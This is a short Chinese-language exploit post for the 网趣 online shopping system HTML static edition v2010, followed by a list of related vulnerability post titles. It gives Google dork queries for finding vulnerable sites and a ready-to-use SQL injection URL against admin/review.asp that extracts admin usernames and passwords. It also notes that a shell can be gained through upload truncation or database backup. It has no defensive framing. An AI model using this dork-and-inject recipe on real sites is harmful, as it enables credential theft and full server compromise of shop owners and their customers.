影响版本:网趣网上购物系统HTML静态版 v2010
漏洞描述:
Google关键字:inurl:buy.asp?action=show
或者:inurl:viewreturn.asp?Page=1
注射代码:
admin/review.asp?id=50%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20admin
自己重新查询下表,或者用工具注入
后台拿SHELL很简单的,上传截断,数据库备份都可以的。
只显示10条记录相关文章
网趣网站管理系统--上传漏洞 (浏览: 13608, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12719, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11292, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12482, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9734, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12719, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11292, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12482, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9734, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9934, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)